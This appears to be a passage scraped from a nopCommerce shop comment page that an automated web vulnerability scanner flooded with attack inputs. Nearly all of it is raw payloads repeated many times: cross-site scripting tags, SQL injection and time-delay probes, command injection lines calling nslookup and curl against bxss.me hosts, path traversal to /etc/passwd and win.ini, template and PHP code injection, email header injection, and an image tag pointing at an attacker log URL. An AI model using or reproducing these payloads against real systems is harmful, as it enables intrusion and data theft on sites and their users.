nopCommerce includes everything you need to begin your e-commerce online store. We have thought of everything and it's all included!
This is a sample comment...
555
response.write(9462835*9425850)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
'+response.write(9462835*9425850)+'
"+response.write(9462835*9425850)+"
YpKFtmBa
echo ikudiq$()\ ykdglt\nz^xyu||a #' &echo ikudiq$()\ ykdglt\nz^xyu||a #|" &echo ikudiq$()\ ykdglt\nz^xyu||a #
&echo umuosw$()\ ecrllk\nz^xyu||a #' &echo umuosw$()\ ecrllk\nz^xyu||a #|" &echo umuosw$()\ ecrllk\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
|echo rtyqsv$()\ szxqrp\nz^xyu||a #' |echo rtyqsv$()\ szxqrp\nz^xyu||a #|" |echo rtyqsv$()\ szxqrp\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
(nslookup hitmgeszxihvue4290.bxss.me||perl -e "gethostbyname('hitmgeszxihvue4290.bxss.me')")
../555
$(nslookup hitbynrrrldhx84fdb.bxss.me||perl -e "gethostbyname('hitbynrrrldhx84fdb.bxss.me')")
&(nslookup hitdbyjbvlfgc4f891.bxss.me||perl -e "gethostbyname('hitdbyjbvlfgc4f891.bxss.me')")&'\"`0&(nslookup hitdbyjbvlfgc4f891.bxss.me||perl -e "gethostbyname('hitdbyjbvlfgc4f891.bxss.me')")&`'
|(nslookup hitloqqknwrcz6f03e.bxss.me||perl -e "gethostbyname('hitloqqknwrcz6f03e.bxss.me')")
`(nslookup hitnrhiynzggsadf27.bxss.me||perl -e "gethostbyname('hitnrhiynzggsadf27.bxss.me')")`
;(nslookup hithlbhxqtenf291f1.bxss.me||perl -e "gethostbyname('hithlbhxqtenf291f1.bxss.me')")|(nslookup hithlbhxqtenf291f1.bxss.me||perl -e "gethostbyname('hithlbhxqtenf291f1.bxss.me')")&(nslookup hithlbhxqtenf291f1.bxss.me||perl -e "gethostbyname('hithlbhxqtenf291f1.bxss.me')")
'"
<!--
555'"()&%<acx><ScRiPt >oaSF(9263)</ScRiPt>
555&n964771=v962882
'"()&%<acx><ScRiPt >oaSF(9906)</ScRiPt>
555bcc:009247.80505-97238.80505.f9d9f.19871.2@bxss.me
to@example.com>bcc:009247.80505-97239.80505.f9d9f.19871.2@bxss.me
5559499407
acu4411<s1﹥s2ʺs3ʹuca4411
/xfs.bxss.me
acux6511%C0%BEz1%C0%BCz2a%90bcxuca6511
555<esi:include src="http://bxss.me/rpb.png"/>
${9999391+9999188}
<%={{={@{#{${acx}}%>
<th:t="${acx}#foreach
)
!(()&&!|*|*|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Http://bxss.me/t/fit.txt
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
bxss.me
acx{{98991*97996}}xca
acx[[${98991*97996}]]xca
acx__${98991*97996}__::.x
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555<ScRiPt >oaSF(9534)</ScRiPt>
"+"A".concat(70-3).concat(22*4).concat(108).concat(83).concat(104).concat(66)+(require"socket"Socket.gethostbyname("hitfb"+"pjncalga42008.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(100).concat(73).concat(106).concat(73)+(require'socket'Socket.gethostbyname('hitdz'+'brcououdb7348.bxss.me.')[3].to_s)+'
555<WFSOUN>SOVRL[!+!]</WFSOUN>
NewsCommentAdd
NewsCommentAdd/.
555<script>oaSF(9269)</script>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555<ScR<ScRiPt>IpT>oaSF(9764)</sCr<ScRiPt>IpT>
555<ScRiPt >oaSF(9686)</ScRiPt>
'"()
'.gethostbyname(lc('hiths'.'eicrhjtva67d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(89).chr(103).chr(86).'
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9729></ScRiPt>
".gethostbyname(lc("hituc"."pbhponnl0f739.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(77).chr(97).chr(67)."
555<isindex type=image src=1 onerror=oaSF(9242)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9577'>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
555<body onload=oaSF(9114)>
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555<img src=//xss.bxss.me/t/dot.gif onload=oaSF(9344)>
555<img src=xyz OnErRor=oaSF(9931)>
555<img/src=">" onerror=alert(9870)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%61%53%46%289320%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\oaSF(9525)\u003C/sCripT\u003E
555<ScRiPt>oaSF(9845)</sCripT>
%F6<img acu onmouseover=oaSF(90611) //%F6>
555<input autofocus onfocus=oaSF(9848)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(oaSF(9167))}
555Dmft9<ScRiPt >oaSF(9611)</ScRiPt>
555<WCIOVF>ZZWOK[!+!]</WCIOVF>
555<ifRAme sRc=9532.com></IfRamE>
555<aEgugdY x=9294>
555<img sRc='http://attacker-9512/log.php?
555<aJrenzg<
-1 OR 2+994-994-1=0+0+0+1 --
-1 OR 2+293-293-1=0+0+0+1
-1' OR 2+628-628-1=0+0+0+1 --
-1' OR 2+964-964-1=0+0+0+1 or '5abHlD9Q'='
-1" OR 2+739-739-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
Z6Rp0sjt'; waitfor delay '0:0:15' --
187Q0fJY'); waitfor delay '0:0:15' --
MMjeJ2LA')); waitfor delay '0:0:15' --
-5 OR 267=(SELECT 267 FROM PG_SLEEP(15))--
-5) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
-1)) OR 916=(SELECT 916 FROM PG_SLEEP(15))--
kbFvUlAG' OR 623=(SELECT 623 FROM PG_SLEEP(15))--
CE8NOjjN') OR 550=(SELECT 550 FROM PG_SLEEP(15))--
Xoa3GnzF')) OR 762=(SELECT 762 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@9vseo
response.write(9884841*9960964)
'+response.write(9884841*9960964)+'
"+response.write(9884841*9960964)+"
<% response.write(9884841*9960964) %>
file:///etc/passwd
+response.write(9884841*9960964)'
echo tmqsjq$()\ fxieek\nz^xyu||a #' &echo tmqsjq$()\ fxieek\nz^xyu||a #|" &echo tmqsjq$()\ fxieek\nz^xyu||a #
&echo evvxhh$()\ cdkibm\nz^xyu||a #' &echo evvxhh$()\ cdkibm\nz^xyu||a #|" &echo evvxhh$()\ cdkibm\nz^xyu||a #
555&echo awtfau$()\ lboknz\nz^xyu||a #' &echo awtfau$()\ lboknz\nz^xyu||a #|" &echo awtfau$()\ lboknz\nz^xyu||a #
|echo samxjw$()\ jtusbc\nz^xyu||a #' |echo samxjw$()\ jtusbc\nz^xyu||a #|" |echo samxjw$()\ jtusbc\nz^xyu||a #
555|echo tgfffc$()\ xbbssg\nz^xyu||a #' |echo tgfffc$()\ xbbssg\nz^xyu||a #|" |echo tgfffc$()\ xbbssg\nz^xyu||a #
(nslookup -q=cname hitvcxvksfkbs53b98.bxss.me||curl hitvcxvksfkbs53b98.bxss.me))
$(nslookup -q=cname hitrddbmlpxpif83b7.bxss.me||curl hitrddbmlpxpif83b7.bxss.me)
&nslookup -q=cname hituhkjnyrnbce1ea0.bxss.me&'\"`0&nslookup -q=cname hituhkjnyrnbce1ea0.bxss.me&`'
&(nslookup -q=cname hitgdmfsbikdv1c953.bxss.me||curl hitgdmfsbikdv1c953.bxss.me)&'\"`0&(nslookup -q=cname hitgdmfsbikdv1c953.bxss.me||curl hitgdmfsbikdv1c953.bxss.me)&`'
|(nslookup -q=cname hitjvufhelikv8b1be.bxss.me||curl hitjvufhelikv8b1be.bxss.me)
`(nslookup -q=cname hitjlnhdfypyt995c7.bxss.me||curl hitjlnhdfypyt995c7.bxss.me)`
;(nslookup -q=cname hitmqlzyfukxvb76e8.bxss.me||curl hitmqlzyfukxvb76e8.bxss.me)|(nslookup -q=cname hitmqlzyfukxvb76e8.bxss.me||curl hitmqlzyfukxvb76e8.bxss.me)&(nslookup -q=cname hitmqlzyfukxvb76e8.bxss.me||curl hitmqlzyfukxvb76e8.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitwurcvhjgshdc9df.bxss.me||curl${IFS}hitwurcvhjgshdc9df.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpmcllvywfoff0b3.bxss.me||curl${IFS}hitpmcllvywfoff0b3.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpmcllvywfoff0b3.bxss.me||curl${IFS}hitpmcllvywfoff0b3.bxss.me)&`'
https://shoptest.crucial.in/
shoptest.crucial.in
-1 OR 2+305-305-1=0+0+0+1 --
555'&&sleep(27*1000)*hcecsz&&'
-1 OR 2+462-462-1=0+0+0+1
555"&&sleep(27*1000)*bfyvte&&"
-1' OR 2+961-961-1=0+0+0+1 --
-1' OR 2+398-398-1=0+0+0+1 or 'Mc4KCIBl'='
555'||sleep(27*1000)*qaxvkw||'
-1" OR 2+867-867-1=0+0+0+1 --
555"||sleep(27*1000)*sappdl||"
555*if(now()=sysdate(),sleep(15),0)
'.gethostbyname(lc('hitwy'.'kfihztqwa5b85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(70).chr(119).chr(78).'
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
".gethostbyname(lc("hitxf"."vlixpstkf47e8.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(73).chr(117).chr(72)."
gethostbyname(lc('hitst'.'cjipfzixa7726.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(100).chr(88).chr(107).chr(89)
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555mOK9lHkE'; waitfor delay '0:0:15' --
5554GbW6yYQ'); waitfor delay '0:0:15' --
555CptDLjxx')); waitfor delay '0:0:15' --
555-1 OR 721=(SELECT 721 FROM PG_SLEEP(15))--
555-1) OR 354=(SELECT 354 FROM PG_SLEEP(15))--
555-1)) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
555odpVIElg' OR 344=(SELECT 344 FROM PG_SLEEP(15))--
5556hDlRuFm') OR 119=(SELECT 119 FROM PG_SLEEP(15))--
555BnYoMA4f')) OR 27=(SELECT 27 FROM PG_SLEEP(15))--
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@RPUpt
"+"A".concat(70-3).concat(22*4).concat(119).concat(75).concat(105).concat(81)+(require"socket"Socket.gethostbyname("hitni"+"cwuuhawhbcd8c.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(112).concat(65).concat(104).concat(76)+(require'socket'Socket.gethostbyname('hitpm'+'lqubklkgd34d8.bxss.me.')[3].to_s)+'
${9999737+9999282}
'A'.concat(70-3).concat(22*4).concat(120).concat(78).concat(116).concat(78)+(require'socket'Socket.gethostbyname('hitau'+'glnkghiod50cd.bxss.me.')[3].to_s)
555'"()&%<zzz><ScRiPt >2RWr(9984)</ScRiPt>
'"()&%<zzz><ScRiPt >2RWr(9734)</ScRiPt>
5559127131
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
bfg10977<s1﹥s2ʺs3ʹhjl10977
/etc/shells
../../../../../../../../../../../../../../etc/shells
bfgx10039%C0%BEz1%C0%BCz2a%90bcxhjl10039
<%={{={@{#{${dfb}}%>
c:/windows/win.ini
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >2RWr(9081)</ScRiPt>
555<WORYMC>CZDRC[!+!]</WORYMC>
555<script>2RWr(9987)</script>
555<script>2RWr(9392)</script>9392
555<ScR<ScRiPt>IpT>2RWr(9296)</sCr<ScRiPt>IpT>
555<ScRiPt >2RWr(9088)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9186></ScRiPt>
555<isindex type=image src=1 onerror=2RWr(9221)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9903'>
555<body onload=2RWr(9121)>
555<img src=//xss.bxss.me/t/dot.gif onload=2RWr(9581)>
555<img src=xyz OnErRor=2RWr(9160)>
555<img/src=">" onerror=alert(9982)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%32%52%57%72%289734%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\2RWr(9650)\u003C/sCripT\u003E
555<ScRiPt>2RWr(9086)</sCripT>
%F6<img zzz onmouseover=2RWr(90631) //%F6>
555<input autofocus onfocus=2RWr(9612)>
555}body{zzz:Expre/**/SSion(2RWr(9634))}
555SQK6p<ScRiPt >2RWr(9565)</ScRiPt>
555<WRP53U>TNMML[!+!]</WRP53U>
555<ifRAme sRc=9568.com></IfRamE>
555<a9ly09H x=9243>
555<img sRc='http://attacker-9464/log.php?
555<aNLbePp<
response.write(9257518*9670593)
'+response.write(9257518*9670593)+'
"+response.write(9257518*9670593)+"
<% response.write(9257518*9670593) %>
+response.write(9257518*9670593)'
'.gethostbyname(lc('hitbs'.'jaamikvff970b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(107).chr(79).chr(104).chr(86).'
".gethostbyname(lc("hitcx"."raadnakb61277.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(88).chr(109).chr(74)."
gethostbyname(lc('hitst'.'twndeupga0802.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(111).chr(86).chr(114).chr(82)
"+"A".concat(70-3).concat(22*4).concat(122).concat(73).concat(106).concat(86)+(require"socket"Socket.gethostbyname("hithi"+"fkhivjqe8b0ad.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(106).concat(81).concat(114).concat(66)+(require'socket'Socket.gethostbyname('hitnx'+'tuyjusxe6c62f.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(97).concat(65).concat(122).concat(78)+(require'socket'Socket.gethostbyname('hithl'+'ccogdftlce356.bxss.me.')[3].to_s)
-1 OR 2+985-985-1=0+0+0+1 --
-1 OR 2+303-303-1=0+0+0+1
-1' OR 2+409-409-1=0+0+0+1 --
-1' OR 2+626-626-1=0+0+0+1 or 'dLlDMB9k'='
-1" OR 2+177-177-1=0+0+0+1 --
5550qMMzJwX'; waitfor delay '0:0:15' --
555YKNXqbWa'); waitfor delay '0:0:15' --
555GS5ksfqr')); waitfor delay '0:0:15' --
555-1 OR 237=(SELECT 237 FROM PG_SLEEP(15))--
555-1) OR 391=(SELECT 391 FROM PG_SLEEP(15))--
555-1)) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
555Hz3txthy' OR 33=(SELECT 33 FROM PG_SLEEP(15))--
5554f8B4f8C') OR 78=(SELECT 78 FROM PG_SLEEP(15))--
555DtAA0u3z')) OR 634=(SELECT 634 FROM PG_SLEEP(15))--
@@XEEGP
-1 OR 5*5=25 --
-1 OR 5*5=25
-1' OR 5*5=25 --
-1" OR 5*5=25 --
-1' OR 5*5=25 or 'CWY6a6I3'='
-1" OR 5*5=25 or "GHi4HyPL"="
555m4qwtfOf'; waitfor delay '0:0:15' --
555PxW0sczM'); waitfor delay '0:0:15' --
555fFX4K2Mt')); waitfor delay '0:0:15' --
555-1 OR 62=(SELECT 62 FROM PG_SLEEP(15))--
555-1) OR 614=(SELECT 614 FROM PG_SLEEP(15))--
555-1)) OR 850=(SELECT 850 FROM PG_SLEEP(15))--
555IjsW4CTc' OR 218=(SELECT 218 FROM PG_SLEEP(15))--
555TuICtCy0') OR 203=(SELECT 203 FROM PG_SLEEP(15))--
555ISZQ4bk7')) OR 247=(SELECT 247 FROM PG_SLEEP(15))--
@@Fwftg
(select 198766*667891)
(select 198766*667891 from DUAL)
-1' OR 5*5=25 or 'fsedrglK'='
-1" OR 5*5=25 or "HsIqAVvI"="
555aqFipMZf'; waitfor delay '0:0:15' --
555pKsfwZsV'); waitfor delay '0:0:15' --
555QrIoZxwU')); waitfor delay '0:0:15' --
555-1 OR 766=(SELECT 766 FROM PG_SLEEP(15))--
555-1) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
555-1)) OR 350=(SELECT 350 FROM PG_SLEEP(15))--
5557XGqqWgq' OR 744=(SELECT 744 FROM PG_SLEEP(15))--
555bbIiIRdJ') OR 854=(SELECT 854 FROM PG_SLEEP(15))--
555E0Bwthmp')) OR 569=(SELECT 569 FROM PG_SLEEP(15))--
@@I43Ck
-1 OR 2+403-403-1=0+0+0+1 --
-1 OR 2+72-72-1=0+0+0+1
-1' OR 2+875-875-1=0+0+0+1 --
-1' OR 2+471-471-1=0+0+0+1 or '42v44l8d'='
-1" OR 2+928-928-1=0+0+0+1 --
555XT11zT9S'; waitfor delay '0:0:15' --
555FjGgcjsC'); waitfor delay '0:0:15' --
555tj91QrI4')); waitfor delay '0:0:15' --
555-1 OR 127=(SELECT 127 FROM PG_SLEEP(15))--
555-1) OR 620=(SELECT 620 FROM PG_SLEEP(15))--
555-1)) OR 517=(SELECT 517 FROM PG_SLEEP(15))--
555ZuKVRKYD' OR 591=(SELECT 591 FROM PG_SLEEP(15))--
555RawwCRMm') OR 471=(SELECT 471 FROM PG_SLEEP(15))--
555uHzFCS2z')) OR 392=(SELECT 392 FROM PG_SLEEP(15))--
@@cq7Yx
-1 OR 2+66-66-1=0+0+0+1 --
-1 OR 2+783-783-1=0+0+0+1
-1' OR 2+818-818-1=0+0+0+1 --
-1' OR 2+458-458-1=0+0+0+1 or 'UDQ1K1ez'='
-1" OR 2+651-651-1=0+0+0+1 --
6GEQzIqn'; waitfor delay '0:0:15' --
xrT4mAnp'); waitfor delay '0:0:15' --
dZc6qkhw')); waitfor delay '0:0:15' --
-5 OR 383=(SELECT 383 FROM PG_SLEEP(15))--
-5) OR 671=(SELECT 671 FROM PG_SLEEP(15))--
-1)) OR 769=(SELECT 769 FROM PG_SLEEP(15))--
fKNhEMO7' OR 814=(SELECT 814 FROM PG_SLEEP(15))--
j4mubLmC') OR 157=(SELECT 157 FROM PG_SLEEP(15))--
qIIy2svO')) OR 59=(SELECT 59 FROM PG_SLEEP(15))--
@@ng3pF
This is a sample comment...
555
response.write(9462835*9425850)
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
'+response.write(9462835*9425850)+'
"+response.write(9462835*9425850)+"
555
555
555
555
YpKFtmBa
555
555
555
555
555
555
echo ikudiq$()\ ykdglt\nz^xyu||a #' &echo ikudiq$()\ ykdglt\nz^xyu||a #|" &echo ikudiq$()\ ykdglt\nz^xyu||a #
&echo umuosw$()\ ecrllk\nz^xyu||a #' &echo umuosw$()\ ecrllk\nz^xyu||a #|" &echo umuosw$()\ ecrllk\nz^xyu||a #
../../../../../../../../../../../../../../etc/passwd
|echo rtyqsv$()\ szxqrp\nz^xyu||a #' |echo rtyqsv$()\ szxqrp\nz^xyu||a #|" |echo rtyqsv$()\ szxqrp\nz^xyu||a #
../../../../../../../../../../../../../../windows/win.ini
(nslookup hitmgeszxihvue4290.bxss.me||perl -e "gethostbyname('hitmgeszxihvue4290.bxss.me')")
555
../555
$(nslookup hitbynrrrldhx84fdb.bxss.me||perl -e "gethostbyname('hitbynrrrldhx84fdb.bxss.me')")
&(nslookup hitdbyjbvlfgc4f891.bxss.me||perl -e "gethostbyname('hitdbyjbvlfgc4f891.bxss.me')")&'\"`0&(nslookup hitdbyjbvlfgc4f891.bxss.me||perl -e "gethostbyname('hitdbyjbvlfgc4f891.bxss.me')")&`'
555
|(nslookup hitloqqknwrcz6f03e.bxss.me||perl -e "gethostbyname('hitloqqknwrcz6f03e.bxss.me')")
555
555
`(nslookup hitnrhiynzggsadf27.bxss.me||perl -e "gethostbyname('hitnrhiynzggsadf27.bxss.me')")`
555
;(nslookup hithlbhxqtenf291f1.bxss.me||perl -e "gethostbyname('hithlbhxqtenf291f1.bxss.me')")|(nslookup hithlbhxqtenf291f1.bxss.me||perl -e "gethostbyname('hithlbhxqtenf291f1.bxss.me')")&(nslookup hithlbhxqtenf291f1.bxss.me||perl -e "gethostbyname('hithlbhxqtenf291f1.bxss.me')")
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
<!--
555
555
555
555
555
555
555
555
555
555'"()&%<acx><ScRiPt >oaSF(9263)</ScRiPt>
555
555
555
555&n964771=v962882
555
'"()&%<acx><ScRiPt >oaSF(9906)</ScRiPt>
555
bcc:009247.80505-97238.80505.f9d9f.19871.2@bxss.me
555
to@example.com>
bcc:009247.80505-97239.80505.f9d9f.19871.2@bxss.me
555
555
5559499407
555
555
acu4411<s1﹥s2ʺs3ʹuca4411
/xfs.bxss.me
acux6511%C0%BEz1%C0%BCz2a%90bcxuca6511
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
${9999391+9999188}
555
555
<%={{={@{#{${acx}}%>
555
555
<th:t="${acx}#foreach
)
!(()&&!|*|*|
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
Http://bxss.me/t/fit.txt
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
^(#$!@#$)(()))******
http://bxss.me/t/fit.txt?.jpg
555
bxss.me
acx{{98991*97996}}xca
555
555
555
555
555
acx[[${98991*97996}]]xca
555
acx__${98991*97996}__::.x
555
555
555
555
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
555
555<ScRiPt >oaSF(9534)</ScRiPt>
"+"A".concat(70-3).concat(22*4).concat(108).concat(83).concat(104).concat(66)+(require"socket"
Socket.gethostbyname("hitfb"+"pjncalga42008.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(100).concat(73).concat(106).concat(73)+(require'socket'
Socket.gethostbyname('hitdz'+'brcououdb7348.bxss.me.')[3].to_s)+'
555
555
555
555<WFSOUN>SOVRL[!+!]</WFSOUN>
NewsCommentAdd
555
555
NewsCommentAdd/.
555
555<script>oaSF(9269)</script>
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555<ScR<ScRiPt>IpT>oaSF(9764)</sCr<ScRiPt>IpT>
555
555<ScRiPt
>oaSF(9686)</ScRiPt>
555
'"()
'.gethostbyname(lc('hiths'.'eicrhjtva67d4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(89).chr(103).chr(86).'
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9729></ScRiPt>
".gethostbyname(lc("hituc"."pbhponnl0f739.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(77).chr(97).chr(67)."
555
555
555
555
555
555
555
555<isindex type=image src=1 onerror=oaSF(9242)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9577'>
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
555<body onload=oaSF(9114)>
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555<img src=//xss.bxss.me/t/dot.gif onload=oaSF(9344)>
555
555
555
555
555<img src=xyz OnErRor=oaSF(9931)>
555
555<img/src=">" onerror=alert(9870)>
555
555
%35%35%35%3C%53%63%52%69%50%74%20%3E%6F%61%53%46%289320%29%3C%2F%73%43%72%69%70%54%3E
555
555
555
555
555\u003CScRiPt\oaSF(9525)\u003C/sCripT\u003E
555<ScRiPt>oaSF(9845)</sCripT>
%F6<img acu onmouseover=oaSF(90611) //%F6>
555<input autofocus onfocus=oaSF(9848)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{acu:Expre/**/SSion(oaSF(9167))}
555Dmft9
<ScRiPt >oaSF(9611)</ScRiPt>
555<WCIOVF>ZZWOK[!+!]</WCIOVF>
555<ifRAme sRc=9532.com></IfRamE>
555<aEgugdY x=9294>
555<img sRc='http://attacker-9512/log.php?
555<aJrenzg<
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+994-994-1=0+0+0+1 --
-1 OR 2+293-293-1=0+0+0+1
-1' OR 2+628-628-1=0+0+0+1 --
-1' OR 2+964-964-1=0+0+0+1 or '5abHlD9Q'='
-1" OR 2+739-739-1=0+0+0+1 --
if(now()=sysdate(),sleep(15),0)
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
-1; waitfor delay '0:0:15' --
-1); waitfor delay '0:0:15' --
-1)); waitfor delay '0:0:15' --
1 waitfor delay '0:0:15' --
Z6Rp0sjt'; waitfor delay '0:0:15' --
187Q0fJY'); waitfor delay '0:0:15' --
MMjeJ2LA')); waitfor delay '0:0:15' --
-5 OR 267=(SELECT 267 FROM PG_SLEEP(15))--
-5) OR 954=(SELECT 954 FROM PG_SLEEP(15))--
-1)) OR 916=(SELECT 916 FROM PG_SLEEP(15))--
kbFvUlAG' OR 623=(SELECT 623 FROM PG_SLEEP(15))--
CE8NOjjN') OR 550=(SELECT 550 FROM PG_SLEEP(15))--
Xoa3GnzF')) OR 762=(SELECT 762 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1'"
@@9vseo
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
555
response.write(9884841*9960964)
'+response.write(9884841*9960964)+'
../../../../../../../../../../../../../../etc/passwd
"+response.write(9884841*9960964)+"
555
../../../../../../../../../../../../../../windows/win.ini
<% response.write(9884841*9960964) %>
555
file:///etc/passwd
+response.write(9884841*9960964)'
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
echo tmqsjq$()\ fxieek\nz^xyu||a #' &echo tmqsjq$()\ fxieek\nz^xyu||a #|" &echo tmqsjq$()\ fxieek\nz^xyu||a #
555
)
&echo evvxhh$()\ cdkibm\nz^xyu||a #' &echo evvxhh$()\ cdkibm\nz^xyu||a #|" &echo evvxhh$()\ cdkibm\nz^xyu||a #
!(()&&!|*|*|
555&echo awtfau$()\ lboknz\nz^xyu||a #' &echo awtfau$()\ lboknz\nz^xyu||a #|" &echo awtfau$()\ lboknz\nz^xyu||a #
^(#$!@#$)(()))******
|echo samxjw$()\ jtusbc\nz^xyu||a #' |echo samxjw$()\ jtusbc\nz^xyu||a #|" |echo samxjw$()\ jtusbc\nz^xyu||a #
555
555|echo tgfffc$()\ xbbssg\nz^xyu||a #' |echo tgfffc$()\ xbbssg\nz^xyu||a #|" |echo tgfffc$()\ xbbssg\nz^xyu||a #
555
(nslookup -q=cname hitvcxvksfkbs53b98.bxss.me||curl hitvcxvksfkbs53b98.bxss.me))
555
$(nslookup -q=cname hitrddbmlpxpif83b7.bxss.me||curl hitrddbmlpxpif83b7.bxss.me)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
&nslookup -q=cname hituhkjnyrnbce1ea0.bxss.me&'\"`0&nslookup -q=cname hituhkjnyrnbce1ea0.bxss.me&`'
&(nslookup -q=cname hitgdmfsbikdv1c953.bxss.me||curl hitgdmfsbikdv1c953.bxss.me)&'\"`0&(nslookup -q=cname hitgdmfsbikdv1c953.bxss.me||curl hitgdmfsbikdv1c953.bxss.me)&`'
';print(md5(31337));$a='
";print(md5(31337));$a="
555
|(nslookup -q=cname hitjvufhelikv8b1be.bxss.me||curl hitjvufhelikv8b1be.bxss.me)
555
${@print(md5(31337))}
`(nslookup -q=cname hitjlnhdfypyt995c7.bxss.me||curl hitjlnhdfypyt995c7.bxss.me)`
555
${@print(md5(31337))}\
